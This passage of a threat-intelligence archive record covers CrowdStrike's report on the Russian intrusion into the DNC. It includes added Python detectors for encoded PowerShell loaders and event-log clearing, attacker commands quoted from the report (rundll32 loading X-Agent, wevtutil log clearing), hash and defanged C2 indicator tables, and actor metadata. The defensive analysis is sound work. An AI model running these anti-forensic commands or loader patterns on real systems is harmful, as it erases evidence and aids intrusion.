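    if len(raw) % 2:                # UTF-16 code units are two bytes wide
        raw = raw[:-1]
    return raw.decode("utf-16-le", errors="replace")


# -EncodedCommand may be abbreviated to any prefix ("-e", "-enc", ...) or "-ec".
_PREFIXES = ["encodedcommand"[:n] for n in range(1, 15)] + ["ec"]
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:" + "|".join(_PREFIXES) + r")\b\s+([A-Za-z0-9+/=]+)")

# Heuristic weights chosen for this example; tune them against your own baseline.
LAUNCH_FLAGS = {"-executionpolicy bypass": 1, "-noninteractive": 1, "-noprofile": 1,
                "-windowstyle hidden": 1, "encodedcommand": 1}
SCRIPT_TOKENS = {"invoke-expression": 3, "iex": 3, "wmiclass": 3, "frombase64string": 2,
                 "rijndaelmanaged": 2, "aesmanaged": 2, "createdecryptor": 2,
                 "net.webclient": 2, "downloadstring": 2}
THRESHOLD = 3


def _has_token(token, text):
    return re.search(r"(?<![\w-])" + re.escape(token) + r"(?![\w-])", text) is not None


def analyze_cmdline(cmdline):
    """Return {'decoded', 'hits', 'score', 'flagged'} for one process command line."""
    line = " ".join(cmdline.lower().split())
    hits = [f for f in LAUNCH_FLAGS if f != "encodedcommand" and _has_token(f, line)]
    m = ENC_FLAG.search(cmdline)
    decoded = decode_command(m.group(1)) if m else ""
    if m:
        hits.append("encodedcommand")
    body = " ".join(decoded.lower().split())
    hits += [t for t in SCRIPT_TOKENS if _has_token(t, body)]
    score = sum(LAUNCH_FLAGS.get(h, 0) + SCRIPT_TOKENS.get(h, 0) for h in hits)
    return {"decoded": decoded, "hits": hits, "score": score, "flagged": score >= THRESHOLD}


if __name__ == "__main__":
    samples = (REPORT_CMDLINE, "powershell.exe -w hidden -enc " + encode_command(LOADER_SCRIPT), BENIGN_CMDLINE)
    for c in samples:
        r = analyze_cmdline(c)
        print(r["flagged"], r["score"], r["hits"], repr(r["decoded"][:40]))
```

The report's command line decodes to the opening of perfCr and scores on its launch flags alone, while a full loader lights up wmiclass, FromBase64String, RijndaelManaged and Invoke-Expression. Treat the threshold as a starting point: -ExecutionPolicy Bypass with an encoded command is common in legitimate automation too, so baseline the weights on your own fleet before alerting on them.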
The encryption keys in the script were different on every system. A PowerShell version of the credential theft tool Mimikatz was also used by the actors to facilitate credential acquisition for lateral movement.\r\nThe FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities for remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as:\r\nrundll32.exe \"C:\\Windows\\twain_64.dll\"\r\nIn addition, FANCY BEAR’s X-Tunnel network tunneling tool, which facilitates connections into NAT-ed environments, was also used to execute remote commands. Both tools were deployed via RemCOM, an open-source replacement for PsExec available from GitHub. They also engaged in a number of anti-forensic measures, such as periodic event log clearing (via the wevtutil cl System and wevtutil cl Security commands) and resetting the timestamps of files.\r\nIntelligence collection directed by nation-state actors against US political targets provides invaluable insight into the requirements placed upon those actors. Regardless of the agency or unit tasked with this collection, the upcoming US election and the associated candidates and parties are of critical interest to both hostile and friendly nation states. 
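The wevtutil clearing described above leaves its own trace: clearing the Security log writes event 1102 ("The audit log was cleared") to the Security log, and clearing any other log writes event 104 ("The <log> log file was cleared") to the System log, both naming the account that did it. The Python below is an added example, not code from the original post or CrowdStrike's tooling; it pairs those cleared-log events with the process-creation event (Security 4688 or Sysmon event 1) that launched the clearing command on the same host shortly before, and also reports clearing commands that produced no cleared-log event. The event records are constructed and already normalised to flat fields whose names (time, host, channel, id, user, command_line, cleared_log) are this example's own.

```python
"""Flag event-log clearing like the wevtutil usage described above and tie each
cleared log back to the process that cleared it."""
import re
from datetime import datetime, timedelta

# Constructed, pre-normalised event records. Real events carry these values in
# EventData; the flat field names here are this example's own convention.
EVENTS = [
    {"time": "2016-05-12T03:14:02Z", "host": "DC01", "channel": "Security", "id": 4688,
     "user": "CORP\\svc_backup", "command_line": "wevtutil.exe cl System"},
    {"time": "2016-05-12T03:14:03Z", "host": "DC01", "channel": "System", "id": 104,
     "user": "CORP\\svc_backup", "cleared_log": "System"},
    {"time": "2016-05-12T03:14:05Z", "host": "DC01", "channel": "Security", "id": 4688,
     "user": "CORP\\svc_backup", "command_line": "wevtutil cl Security"},
    {"time": "2016-05-12T03:14:06Z", "host": "DC01", "channel": "Security", "id": 1102,
     "user": "CORP\\svc_backup", "cleared_log": "Security"},
    {"time": "2016-05-12T09:00:00Z", "host": "WS07", "channel": "Security", "id": 4688,
     "user": "CORP\\alice", "command_line": "wevtutil.exe qe Application /c:5"},   # benign query
    {"time": "2016-05-12T10:30:00Z", "host": "WS03", "channel": "Microsoft-Windows-Sysmon/Operational",
     "id": 1, "user": "CORP\\bob", "command_line": "powershell -c Clear-EventLog -LogName Application"},
    {"time": "2016-05-13T01:00:00Z", "host": "WS09", "channel": "System", "id": 104,
     "user": "NT AUTHORITY\\SYSTEM", "cleared_log": "Application"},   # no launcher recorded
]

CLEARED = {("Security", 1102), ("System", 104)}      # audit log cleared / <log> log file cleared
PROC_CREATE = {("Security", 4688), ("Microsoft-Windows-Sysmon/Operational", 1)}
# wevtutil cl|clear-log <log>, or the PowerShell Clear-EventLog [-LogName] <log>
CLEAR_CMD = re.compile(
    r'(?i)(?:\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+|\bclear-eventlog\s+(?:-logname\s+)?)["\']?([\w/-]+)')
TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"


def _ts(s):
    return datetime.strptime(s, TIME_FMT)


def find_log_clearing(events, window=timedelta(seconds=120)):
    """Return alerts: each cleared-log event paired with the launcher that most
    plausibly caused it (same host, same log, shortly before), plus any clearing
    command that never produced a cleared-log event (failed, or auditing off)."""
    launchers = []
    for e in events:
        m = CLEAR_CMD.search(e.get("command_line", ""))
        if (e["channel"], e["id"]) in PROC_CREATE and m:
            launchers.append({"time": _ts(e["time"]), "host": e["host"], "user": e["user"],
                              "log": m.group(1).lower(), "command_line": e["command_line"],
                              "matched": False})
    alerts = []
    for e in events:
        if (e["channel"], e["id"]) not in CLEARED:
            continue
        t = _ts(e["time"])
        cause = None
        for l in launchers:     # latest matching launcher inside the window wins
            if (l["host"] == e["host"] and l["log"] == e["cleared_log"].lower()
                    and timedelta(0) <= t - l["time"] <= window
                    and (cause is None or l["time"] > cause["time"])):
                cause = l
        if cause:
            cause["matched"] = True
        alerts.append({"kind": "log_cleared", "host": e["host"], "log": e["cleared_log"].lower(),
                       "time": e["time"], "user": e["user"],
                       "command_line": cause["command_line"] if cause else None})
    alerts += [{"kind": "clear_attempt", "host": l["host"], "log": l["log"],
                "time": l["time"].strftime(TIME_FMT), "user": l["user"],
                "command_line": l["command_line"]} for l in launchers if not l["matched"]]
    return alerts


if __name__ == "__main__":
    for a in find_log_clearing(EVENTS):
        print(a["kind"], a["time"], a["host"], a["log"], a["user"], a["command_line"])
```

A cleared-log event with no launcher (the WS09 case) deserves the same attention as one with: the actor may have cleared the log from a process that was not audited, or may have cleared the very log that held the 4688 record, which is exactly why the Security log is a target.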
The 2016 presidential election has the world’s attention, and leaders of other states are anxiously watching and planning for possible outcomes. Attacks against electoral candidates and the parties they represent are likely to continue up until the election in November.\r\nIndicators of Compromise (C2 addresses are defanged with \u003c.\u003e):\r\nIOC | Adversary | IOC Type | Additional Info\r\n6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536 | COZY BEAR | SHA256 | pagemgr.exe (SeaDaddy implant)\r\nb101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae | COZY BEAR | SHA256 | pagemgr.exe (SeaDaddy implant)\r\n185\u003c.\u003e100\u003c.\u003e84\u003c.\u003e134:443 | COZY BEAR | C2 | SeaDaddy implant C2\r\n58\u003c.\u003e49\u003c.\u003e58\u003c.\u003e58:443 | COZY BEAR | C2 | SeaDaddy implant C2\r\n218\u003c.\u003e1\u003c.\u003e98\u003c.\u003e203:80 | COZY BEAR | C2 | PowerShell implant C2\r\n187\u003c.\u003e33\u003c.\u003e33\u003c.\u003e8:80 | COZY BEAR | C2 | PowerShell implant C2\r\nfd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5 | FANCY BEAR | SHA256 | twain_64.dll (64-bit X-Agent implant)\r\n4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976 | FANCY BEAR | SHA256 | VmUpgradeHelper.exe (X-Tunnel implant)\r\n40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f | FANCY BEAR | SHA256 | VmUpgradeHelper.exe (X-Tunnel implant)\r\n185\u003c.\u003e86\u003c.\u003e148\u003c.\u003e227:443 | FANCY BEAR | C2 | X-Agent implant C2\r\n45\u003c.\u003e32\u003c.\u003e129\u003c.\u003e185:443 | FANCY BEAR | C2 | X-Tunnel implant C2\r\n23\u003c.\u003e227\u003c.\u003e196\u003c.\u003e217:443 | FANCY BEAR | C2 | X-Tunnel implant C2\r\nSource: 
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
	],
	"report_names": [
		"bears-midst-intrusion-democratic-national-committee"
	],
	"threat_actors": [
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider",
				"FIN7",
				"Silicon"
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "cfdd35af-bd12-4c03-8737-08fca638346d",
			"created_at": "2022-10-25T16:07:24.165595Z",
			"updated_at": "2026-04-10T02:00:04.887031Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Cosmic Wolf",
				"Marbled Dust",
				"Silicon",
				"Teal Kurma",
				"UNC1326"
			],
			"source_name": "ETDA:Sea Turtle",
			"tools": [
				"Drupalgeddon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e",
			"created_at": "2024-06-04T02:03:07.956135Z",
			"updated_at": "2026-04-10T02:00:03.689959Z",
			"deleted_at": null,
			"main_name": "IRON HEMLOCK",
			"aliases": [
				"APT29",
				"ATK7",
				"Blue Kitsune",
				"Cozy Bear",
				"The Dukes",
				"UNC2452",
				"YTTRIUM"
			],
			"source_name": "Secureworks:IRON HEMLOCK",
			"tools": [
				"CosmicDuke",
				"CozyCar",
				"CozyDuke",
				"DiefenDuke",
				"FatDuke",
				"HAMMERTOSS",
				"LiteDuke",
				"MiniDuke",
				"OnionDuke",
				"PolyglotDuke",
				"RegDuke",
				"RegDuke Loader",
				"SeaDuke",
				"Sliver"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "33ae2a40-02cd-4dba-8461-d0a50e75578b",
			"created_at": "2023-01-06T13:46:38.947314Z",
			"updated_at": "2026-04-10T02:00:03.155091Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"UNC1326",
				"COSMIC WOLF",
				"Marbled Dust",
				"SILICON",
				"Teal Kurma"
			],
			"source_name": "MISPGALAXY:Sea Turtle",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "62b1b01f-168d-42db-afa1-29d794abc25f",
			"created_at": "2025-04-23T02:00:55.22426Z",
			"updated_at": "2026-04-10T02:00:05.358041Z",
			"deleted_at": null,
			"main_name": "Sea Turtle",
			"aliases": [
				"Sea Turtle",
				"Teal Kurma",
				"Marbled Dust",
				"Cosmic Wolf",
				"SILICON"
			],
			"source_name": "MITRE:Sea Turtle",
			"tools": [
				"SnappyTCP"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb",
			"created_at": "2023-01-06T13:46:38.393409Z",
			"updated_at": "2026-04-10T02:00:02.955738Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"Cloaked Ursa",
				"TA421",
				"Blue Kitsune",
				"BlueBravo",
				"IRON HEMLOCK",
				"G0016",
				"Nobelium",
				"Group 100",
				"YTTRIUM",
				"Grizzly Steppe",
				"ATK7",
				"ITG11",
				"COZY BEAR",
				"The Dukes",
				"Minidionis",
				"UAC-0029",
				"SeaDuke"
			],
			"source_name": "MISPGALAXY:APT29",
			"tools": [
				"SNOWYAMBER",
				"HALFRIG",
				"QUARTERRIG"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28",
				"ATK5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"GRAPHITE",
				"Group 74",
				"PawnStorm",
				"STRONTIUM",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"TA422",
				"TG-4127",
				"Tsar Team",
				"UAC-0001"
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a",
			"created_at": "2022-10-25T15:50:23.548494Z",
			"updated_at": "2026-04-10T02:00:05.292748Z",
			"deleted_at": null,
			"main_name": "APT29",
			"aliases": [
				"APT29",
				"IRON RITUAL",
				"IRON HEMLOCK",
				"NobleBaron",
				"Dark Halo",
				"NOBELIUM",
				"UNC2452",
				"YTTRIUM",
				"The Dukes",
				"Cozy Bear",
				"CozyDuke",
				"SolarStorm",
				"Blue Kitsune",
				"UNC3524",
				"Midnight Blizzard"
			],
			"source_name": "MITRE:APT29",
			"tools": [
				"PinchDuke",
				"ROADTools",
				"WellMail",
				"CozyCar",
				"Mimikatz",
				"Tasklist",
				"OnionDuke",
				"FatDuke",
				"POSHSPY",
				"EnvyScout",
				"SoreFang",
				"GeminiDuke",
				"reGeorg",
				"GoldMax",
				"FoggyWeb",
				"SDelete",
				"PolyglotDuke",
				"AADInternals",
				"MiniDuke",
				"SeaDuke",
				"Sibot",
				"RegDuke",
				"CloudDuke",
				"GoldFinder",
				"AdFind",
				"PsExec",
				"NativeZone",
				"Systeminfo",
				"ipconfig",
				"Impacket",
				"Cobalt Strike",
				"PowerDuke",
				"QUIETEXIT",
				"HAMMERTOSS",
				"BoomBox",
				"CosmicDuke",
				"WellMess",
				"VaporRage",
				"LiteDuke"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434419,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c2621e0a5c1e5ea12983cc105c4e671f7af41d98.pdf",
		"text": "https://archive.orkl.eu/c2621e0a5c1e5ea12983cc105c4e671f7af41d98.txt",
		"img": "https://archive.orkl.eu/c2621e0a5c1e5ea12983cc105c4e671f7af41d98.jpg"
	}
}